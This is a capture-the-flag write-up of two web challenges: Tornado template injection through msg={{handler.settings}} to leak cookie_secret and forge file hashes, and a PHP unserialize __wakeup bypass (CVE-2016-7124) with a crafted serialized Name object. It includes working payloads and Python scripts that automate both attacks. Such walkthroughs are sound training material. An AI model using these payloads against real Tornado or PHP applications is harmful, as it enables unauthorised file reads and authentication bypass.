1. [护网杯2018]easy_tornado
The challenge title hints at Tornado template injection.
Opening the listed files shows that a file is fetched with two parameters: the file name and a filehash.
hint.txt gives the filehash formula, md5(cookie_secret + md5(filename)), but cookie_secret is unknown.
flag.txt gives the path of the flag file, /fllllllllllllag.
Requesting the flag file with an arbitrary filehash produces an error page, and the msg parameter of that error page is reflected into the response.
That msg parameter is the Tornado template injection point: in a Tornado template {{ expr }} evaluates a Python expression, and handler is the current RequestHandler, so the following payload dumps the application settings dict:
msg={{handler.settings}}
The dump contains cookie_secret, so the filehash can now be computed.
Since Tornado is a Python framework, the md5 is computed in Python as well.
The Python3 code is as follows:
import hashlib

cookie_secret = 'd82987f7-d38a-4b13-9487-2681dd17c8cc'
filename = '/fllllllllllllag'

# inner hash: md5(filename)
result = hashlib.md5()
result.update(filename.encode('utf-8'))
r1 = result.hexdigest()

# outer hash: md5(cookie_secret + md5(filename)), which is the filehash
result = hashlib.md5()
result.update((cookie_secret + r1).encode('utf-8'))
print(result.hexdigest())
Request the flag file with this filehash to get the FLAG.
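As an added example that is not part of the original writeup, the whole chain in Python: pull cookie_secret out of the settings dict leaked through msg={{handler.settings}}, compute filehash = md5(cookie_secret + md5(filename)) for any file, and build the download URL. The LEAKED_SETTINGS sample is constructed (a real Tornado settings dump has more keys, some of them not valid Python literals, which is why a regex is used instead of ast.literal_eval); the /file endpoint path and the http://target base URL are assumptions, since the writeup does not name them.

```python
import hashlib
import re
from urllib.parse import urlencode

# Constructed sample of what the error page renders for msg={{handler.settings}}.
# A real dump contains more keys; only cookie_secret matters here.
LEAKED_SETTINGS = ("{'autoreload': True, 'compiled_template_cache': False, "
                   "'cookie_secret': 'd82987f7-d38a-4b13-9487-2681dd17c8cc'}")

_SECRET_RE = re.compile(r"'cookie_secret':\s*'([^']*)'")


def extract_cookie_secret(rendered):
    """Pull cookie_secret out of the rendered handler.settings dict."""
    m = _SECRET_RE.search(rendered)
    if not m:
        raise ValueError("cookie_secret not found in rendered settings")
    return m.group(1)


def md5_hex(text):
    """md5 of a str, as a 32-character lowercase hex digest."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def filehash(cookie_secret, filename):
    """The formula from hint.txt: filehash = md5(cookie_secret + md5(filename))."""
    return md5_hex(cookie_secret + md5_hex(filename))


def file_url(base, cookie_secret, filename, endpoint="/file"):
    """Build the download URL. The endpoint path is an assumption, not from the writeup."""
    query = urlencode({"filename": filename,
                       "filehash": filehash(cookie_secret, filename)})
    return "%s%s?%s" % (base.rstrip("/"), endpoint, query)


if __name__ == "__main__":
    secret = extract_cookie_secret(LEAKED_SETTINGS)
    # http://target is a placeholder for the challenge host
    print(file_url("http://target", secret, "/fllllllllllllag"))
```

Because the filehash is keyed only by cookie_secret, leaking that one value lets you fetch any file the handler is willing to serve, not just the flag.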
2. [Geek Challenge 2019] PHP (CVE-2016-7124)
Visiting the environment shows a notice that the site has a backup.
After trying common names such as .bak, the backup turns out to be www.zip.
Download it and read class.php and index.php.
This is a deserialization challenge. index.php passes the select parameter to unserialize(), so a serialized object of class Name has to be supplied there, with username=admin and password=100.
However, Name defines a __wakeup() method that overwrites username after the object has been reconstructed, so __wakeup() has to be bypassed.
PHP vulnerability CVE-2016-7124:
If a class defines the magic method __wakeup(), unserialize() calls it right after rebuilding the object from the serialized string. However, when the property count declared in the serialized string is larger than the number of properties actually present, unserialize() on affected versions (PHP before 5.6.25 and 7.0.x before 7.0.10) still returns the object but skips the __wakeup() call.
The PHP code to generate the serialized string (same class name and private properties as in class.php):
<?php
class Name{
    private $username = "admin";
    private $password = 100;
}
$Name = new Name;
echo serialize($Name);
?>
The serialized result is shown below. The private property names are mangled as \0Name\0username and \0Name\0password; the NUL bytes are invisible when echoed, which is why they look like spaces in the browser:
O:4:"Name":2:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}
The serialized object has the following layout:
O:class name length:class name:property count:{s:property 1 name length:property 1 name;s:property 1 value length:property 1 value (str);s:property 2 name length:property 2 name;i:property 2 value (int);......}
Two changes are needed:
- Change the property count from 2 to a value greater than the real number of properties (3 here), so that __wakeup() is skipped
- Replace the NUL bytes in the private property names with %00, i.e. URL-encode them, so they survive in the query string
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
Send it as a GET request to get the FLAG.
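As an added example that is not part of the original writeup, the payload construction in Python so the serialized string does not have to be hand-edited: it mangles private property names the way PHP does (\0Class\0name), bumps the property count in the object header to trigger the CVE-2016-7124 __wakeup() bypass, and encodes the NUL bytes as %00 for the query string. The class and property names are the ones from class.php; the helper names (php_serialize_object, bump_property_count, build_payload) are this example's own.

```python
import re


def php_serialize_value(value):
    """Serialize a Python str/int/bool the way PHP's serialize() does."""
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # PHP counts bytes, not characters, in the s:<len> prefix
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    raise TypeError("unsupported type: %r" % type(value))


def php_serialize_object(classname, props):
    """
    Build the serialized form of an object whose properties are given as
    (name, visibility, value) tuples. Private names are mangled as
    "\0Class\0name" and protected ones as "\0*\0name", exactly as PHP does.
    """
    parts = []
    for name, visibility, value in props:
        if visibility == "private":
            mangled = "\x00%s\x00%s" % (classname, name)
        elif visibility == "protected":
            mangled = "\x00*\x00%s" % name
        else:
            mangled = name
        parts.append(php_serialize_value(mangled) + php_serialize_value(value))
    return 'O:%d:"%s":%d:{%s}' % (len(classname), classname, len(props), "".join(parts))


_COUNT_RE = re.compile(r'^(O:\d+:"[^"]+":)(\d+)(:\{)')


def bump_property_count(serialized, extra=1):
    """
    Rewrite the property count in the object header so it is larger than the
    number of properties actually present. On PHP before 5.6.25 / 7.0.10
    (CVE-2016-7124) unserialize() still builds the object but skips __wakeup().
    """
    m = _COUNT_RE.match(serialized)
    if not m:
        raise ValueError("not a serialized PHP object")
    real = int(m.group(2))
    return m.group(1) + str(real + extra) + m.group(3) + serialized[m.end():]


def url_ready(serialized):
    """Encode the NUL bytes as %00 so the payload survives as a GET parameter."""
    return serialized.replace("\x00", "%00")


def build_payload(classname="Name", username="admin", password=100):
    """The select= value for this challenge: Name object, count bumped, NULs encoded."""
    obj = php_serialize_object(classname, [
        ("username", "private", username),
        ("password", "private", password),
    ])
    return url_ready(bump_property_count(obj))


if __name__ == "__main__":
    print("?select=" + build_payload())
```

Only the NUL bytes are encoded here, matching the payload above; if the target's web server or a proxy is strict about raw quotes and braces in the query string, run the result through urllib.parse.quote as well.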